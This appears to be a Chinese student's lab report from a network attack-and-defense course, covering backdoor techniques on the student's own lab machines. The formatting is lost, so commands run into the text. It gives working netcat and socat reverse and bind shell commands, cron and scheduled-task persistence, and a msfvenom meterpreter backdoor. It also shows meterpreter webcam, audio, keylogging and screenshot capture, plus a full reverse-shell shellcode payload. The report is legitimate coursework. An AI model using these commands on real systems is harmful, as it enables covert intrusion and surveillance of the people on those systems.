标签:eth 就会 自启 html sfv 保存 重定向 cmd guide
使用netcat获取主机操作Shell,cron启动
使用socat获取主机操作Shell, 任务计划启动
使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
例举你能想到的一个后门进入到你系统中的可能方式?
例举你知道的后门如何启动起来(win及linux)的方式?
Meterpreter有哪些给你映像深刻的功能?
如何发现自己有系统有没有被安装后门?
nestat -na
查看是否有异常开放的端口E:\nc\ncat>ncat.exe -l -p 5217
nc 192.168.43.98 5217 -e /bin/sh
ls
、pwd
...nc -l -p 5217
ncat.exe -e cmd.exe 192.168.189.136 5217
ncat.exe -l 5217 > file1.out
监听5217
端口,将收到的内容存储在file1.out
中5217
端口,nc 192.168.43.98 5217
type file1.out
在Windows中查看接收到的内容cat file1.in
在kali中查看发送的内容msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.98 LPORT=5217 -f exe > backdoor.exe
生成后门可执行文件,然后移动到Win-p
:使用的连接(playload)。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode-f
:生成文件的类型LHOST
:反弹回连的IPLPORT
:回连的端口>
: 输出到哪个文件msfvenom
进入MSFuse exploit/multi/handler
进入handlerset payload windows/meterpreter/reverse_tcp
设置连接(playload)show options
查看设置是否正确set LHOST 192.168.189.136
设置ip地址(Linux地址)set LPORT 5217
设置端口号show options
再次查看设置是否正确exploit
打开监听man cron
。crontab -e
指令-e
表示编辑,根据提示选择3
每个小时到了43分,上面的那条指令就会执行。
在win主机192.168.43.98让nc侦听在5217端口,那到了17分就会有获得一个shell。
crontab -e
指令编辑一条定时任务操作
,在程序或脚本
中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5217 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe绑定到端口5217
,同时把cmd.exe的stderr重定向到stdout上;socat - tcp:192.168.43.98:5217
,即可发现已经成功获得了一个cmd shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.98 LPORT=5217 -f exe > backdoor.exe
生成后门可执行文件ncat.exe -lv 5217 > backdoor.exe
指令将被控制主机进入接受文件模式nc 192.168.43.98 5217 < backdoor.exe
,注意这里的IP为被控主机(win)的IPbackdoor.exe
,运行前应提前关闭杀毒软件的防护MSF meterpreter
的一系列指令实现功能record_mi
指令截获一段音频webcam_snap
指令使用摄像头进行拍照keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录screenshot
指令进行截屏pwn1
可执行文件绑定的后门可执行文件,并传输到被攻击的机器msfvenom -p linux/x86/meterpreter/reverse_tcp -x pwn1.bak LHOST=192.168.43. LPORT=5209 -f elf > pwn1_exp2 生成与
pwn1```绑定的后门程序input_shellcode
perl -e 'print "A" x 32;print"\xb0\xd1\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode
问题一:
解决一:
然后,它换了一种报错方式
接着,打开任务管理器将与wm相关的进程全部杀死后,重启主机,就好了~
问题二:
解决二:
ifconfig -a
发现eth0停止工作了etc/network/interfaces
,添加后两行auto eth0
iface eth0 inet dhcp
/etc/init.d/networking restart
重置网络,就OK了~问题三:
解决三:
? ? ? ?本次实验做的是后门,这次原理理解方面没有上次那么晦涩难懂,主要就是软件使用方面比较麻烦,特比较容易出问题,稍有不注意自己的思路就会乱掉。
? ? ? ?这次实验我同样是参考老师的实验指导和组长的博客完成的,但与上次不同的是,这次出现的问题我都是自己先尽力自己解决,再去问同学,这样虽然做的慢了些,但对知识的理解更加深入,软件的使用更加熟练。
? ? ? ?这次实验虽然使我对后门有了一定的理解,但是一些比较深的理论方面的东西还是理解的不是很到位,还是有一些问题的吧,之后我会继续努力的。
2019-2020-2 网络对抗技术 20175217 Exp2 后门原理与实践
标签:eth 就会 自启 html sfv 保存 重定向 cmd guide
原文地址:https://www.cnblogs.com/wyf20175217/p/12483897.html